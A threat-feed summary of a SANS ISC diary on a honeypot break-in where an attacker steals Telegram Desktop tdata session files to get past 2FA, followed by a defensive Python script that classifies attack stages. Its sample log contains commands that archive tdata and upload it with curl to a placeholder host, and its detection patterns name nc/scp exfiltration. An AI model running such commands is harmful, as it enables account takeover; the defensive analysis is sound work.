
[Guest Diary] Beyond Cryptojacking: Telegram tdata as a Credential Harvesting Vector, Lessons from a Honeypot Incident, (Wed, Apr 22nd)

ID: a68247a2-fe25-589c-a493-1eb2df3f71d9

STIX ID: report--a68247a2-fe25-589c-a493-1eb2df3f71d9

Feed Name: SANS ISC Diary

Threat Score
60/100

Date Published: 2026-04-22

Date Updated: 2026-04-22

...
...

This report describes a honeypot compromise in which an attacker gained SSH access, performed system reconnaissance, checked for existing cryptominers, and then searched for Telegram Desktop 'tdata' session files in order to steal the persistent authentication tokens they hold. Because those tokens represent an already-authenticated session, copying the directory to another machine yields immediate account access with no login prompt or 2FA challenge, i.e. account takeover that sidesteps 2FA. The analysis maps the observed commands to an attack chain, explains why a copied tdata directory works on another host, and recommends mitigations including SSH hardening, file integrity monitoring, audits of active Telegram sessions, and network detection of Telegram-related exfiltration.
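As an added example (not code from the diary, and not a reproduction of the commands the diary observed), the following Python script shows the kind of detection logic the summary's "map observed commands to an attack chain" and "session audits / file integrity monitoring" recommendations imply: it reads a honeypot command log, tags each command with an attack-chain stage (reconnaissance, miner check, tdata hunting, exfiltration staging), and reports which sessions reached the tdata stage. The log format, the stage patterns and every sample command line are constructed for illustration; the tdata path and the 203.0.113.5 address are documentation placeholders.

```python
"""Tag honeypot shell commands with attack-chain stages and flag tdata theft.

Added example, not code from the SANS ISC diary. The log format
(ISO-timestamp<TAB>session-id<TAB>command) and all patterns and sample
lines below are constructed assumptions for illustration.
"""
import re
from collections import OrderedDict

# Ordered from most to least specific: a command that would match several
# stages is attributed to the first one that matches.
STAGE_PATTERNS = OrderedDict([
    ("exfil_staging", [
        r"\b(tar|zip|7z)\b.*\btdata\b",            # archiving the session dir
        r"\b(scp|nc|ncat)\b.*\btdata\b",           # sending it over the network
        r"\bcurl\b.*(-T\s|--upload-file|-F\s|-d\s@)",  # curl upload forms
    ]),
    ("tdata_hunt", [
        r"\btdata\b",
        r"Telegram\s*Desktop",
        r"telegram[-_ ]?desktop",
    ]),
    ("miner_check", [
        r"\b(xmrig|minerd|kdevtmpfsi|kinsing)\b",  # looking for competing miners
        r"\bps\b.*\b(aux|-ef)\b.*\bgrep\b.*(miner|xmrig)",
        r"\btop\b",
    ]),
    ("recon", [
        r"\b(uname|whoami|id|hostname|lscpu|nproc|free|df)\b",
        r"cat\s+/proc/(cpuinfo|meminfo)",
        r"\bls\b\s+-la?\s+/home",
    ]),
])

# Constructed sample log; these are not the commands observed in the diary.
SAMPLE_LOG = """\
# constructed sample, format: ISO-timestamp<TAB>session-id<TAB>command
2026-04-10T02:14:05Z\ts1\tuname -a
2026-04-10T02:14:07Z\ts1\tcat /proc/cpuinfo | grep -c processor
2026-04-10T02:14:12Z\ts1\tps aux | grep -i xmrig
2026-04-10T02:14:30Z\ts1\tfind / -type d -name tdata 2>/dev/null
2026-04-10T02:15:02Z\ts1\ttar czf /tmp/.t.tgz /home/user/.local/share/TelegramDesktop/tdata
2026-04-10T02:15:40Z\ts1\tcurl -T /tmp/.t.tgz http://203.0.113.5/up
2026-04-10T03:01:11Z\ts2\twhoami
2026-04-10T03:01:15Z\ts2\tls -la /home
"""


def classify(command):
    """Return the attack-chain stage for one shell command, or 'other'."""
    for stage, patterns in STAGE_PATTERNS.items():
        if any(re.search(p, command, re.IGNORECASE) for p in patterns):
            return stage
    return "other"


def build_timeline(log_lines):
    """Parse tab-separated log lines into stage-tagged events, in order."""
    events = []
    for line in log_lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        ts, session, command = line.split("\t", 2)
        events.append({"ts": ts, "session": session,
                       "cmd": command, "stage": classify(command)})
    return events


def sessions_hunting_tdata(events):
    """Sessions that searched for, or staged exfiltration of, tdata."""
    return sorted({e["session"] for e in events
                   if e["stage"] in ("tdata_hunt", "exfil_staging")})


if __name__ == "__main__":
    timeline = build_timeline(SAMPLE_LOG.splitlines())
    for e in timeline:
        print(f"{e['ts']} {e['session']:<3} {e['stage']:<14} {e['cmd']}")
    print("sessions reaching tdata stage:", sessions_hunting_tdata(timeline))
```

Running it prints the tagged timeline and names session s1 as the one that went beyond reconnaissance and miner checks to locate and package tdata. In a real deployment the same tagging would sit on top of auditd or a honeypot's command capture, and any hit in the tdata_hunt or exfil_staging stage is the trigger for the diary's remaining recommendations: revoke active Telegram sessions from a trusted device and check the file-integrity baseline of the session directory.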
